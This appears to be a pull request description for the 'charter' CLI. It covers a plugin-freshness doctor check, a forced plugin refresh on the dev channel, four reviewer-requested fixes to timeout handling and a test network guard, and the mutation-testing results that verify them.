- **`charter doctor` gains a `plugin files` row** comparing installed cache to marketplace clone by *content*, over the directories a plugin actually loads — so `tests/` churn is not reported as a stale plugin. WARN on `dev`; green-with-the-facts on `stable`, where drift is the steady state between releases and a permanent yellow row would train people past it.
- **`charter update` on `dev` force-refreshes the plugin**: `marketplace update` → `uninstall` → `install`. Verified end to end in an isolated `CLAUDE_CONFIG_DIR`: `install` alone against an installed plugin is a no-op, and without the marketplace step the reinstall re-copies the same stale content. Content hash went `72b57819e99e` → `c9b4eb177b3f`, matching the clone.

Everything reads `claude plugin … --json`, never `~/.claude/plugins/*` — those are internals charter does not own (`bin/edm` bet on one and broke silently, #197). Only `charter@charter` is recognised: `force_refresh` uninstalls what that lookup returns, and a plugin called `charter` from somebody else's marketplace is not charter's to touch.

## Round two — review fixes (bbce693)

An independent review returned REQUEST_CHANGES on four findings. All four are fixed and each was reproduced before and after.

**B1 — the freshness check took the whole preflight down.** `util.run` raises `ProcTimeout` regardless of `check=False`, and nothing caught it — not `_claude_json`, not the check, and not `doctor._checks()`, an eager list literal with no per-check guard. `hooks/hooks.json` renders a non-zero `charter doctor` as `charter preflight failed - fix before working:` at every SessionStart.

```
hanging `claude`, before:  16.1s   EXIT=1   0 rows
hanging `claude`, after:    5.9s   EXIT=0  30 rows
  !  plugin files     not checked (could not read `claude plugin list --json`)
```

`_claude_json` now catches `(ProcTimeout, OSError)` — the second because `shutil.which` and the exec are two moments. `LIST_TIMEOUT` drops 15 → `doctor.CHECK_TIMEOUT` (5.0), pinned equal by a test: two reads at 15s was 30s against a 20s hook budget the constant's own comment cited while exceeding. The check also gains the row-level guard every other network-touching check here already has.

**B2 — "I could not look" rendered as a GREEN "not installed."**

```
before:  ✓  plugin files     the charter plugin is not installed here     EXIT=0
after:   !  plugin files     not checked (could not read `claude plugin list --json`)
             → This check could not run, so its silence means nothing. …
```

That green row is what any `claude` too old to understand `--json` received — the population most likely to be running a stale plugin, and the exact defect the #171 audit removed everywhere else. An `UNKNOWN` sentinel now carries the third state, and the test that *pinned* the collapse catches it.

**B3 — `_refresh_plugin`'s "never fatal" was false.** `force_refresh` ran `util.run` at 120s unguarded; verified in-process that unguarded raises `ProcTimeout` and guarded returns `(False, …)`. This runs after the CLI has been replaced and the harness artifact moved, so an escape ended a *successful* update in a traceback. A failure landing after the uninstall now leads with what the operator has — `the plugin is now UNINSTALLED … Restore it: claude plugin install charter@charter --scope user -y` — instead of naming only the argv that broke.

**B4 — the render-path guard was inert.** The blocking stub raised `AssertionError`, which **is** an `Exception`, so `_fetch_head`'s bare `except Exception` swallowed it. Adding a live GitHub GET to `newer_head` left the guard class green; what actually reddened it was a sibling class making a **real request to api.github.com**. charter's most important status-line invariant was pinned by network access and would have gone unpinned offline — the identical root cause fixed one class down and left standing here.

Replaced with a `NoNetwork` mixin that refuses with a `BaseException` nothing in charter catches, **records** every attempt before raising, asserts the record is empty in an automatic cleanup, and is installed on the commit-comparison class too. A positive-control class proves the block blocks — including one test asserting an `except Exception` handler cannot swallow it. Re-run under the mutation, both classes now fail with `NetworkReached`: no socket, no DNS.

**Also closed:** M34 was tautological (it built its expected set from a literal identical to the constant, so it could catch a removal but never the addition its docstring named) — it now enumerates the repo's top-level directories and requires each to be classified, verified by creating `mcp/` (RED) and removing it (green). M21 pins `--version`'s laziness and its other half. M32 pins "no format call on this path" with a brace-bearing canary. The now-redundant `_PLUGIN_ID_RE` check in `installed_charter_plugin` is deleted rather than kept as indistinguishable defence-in-depth. `_autosync_version_lock`'s silence when the pin equals the running version is covered, with why it is correct.

## Verification

- Suite: `Ran 4415 tests` — **OK**.
- **47 mutations applied, 47 caught** (round one: 33 applied, 33 caught after fixing one survivor; the reviewer's independent run found 4 more, all now closed). Every mutation restored from the original text with `__pycache__` cleared on both sides.
- No test makes a network call. Under M5 the block is what fails, not a live GET.
- `uv tool install --force git+…@dev-channel` into a scratch `UV_TOOL_DIR` (global install untouched) → `charter 0.51.0+dev (dev-channel @ d7ca652)`, `--help` ok, `doctor` exit 0.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01GNrdmddmvWf1AxLroXwnx9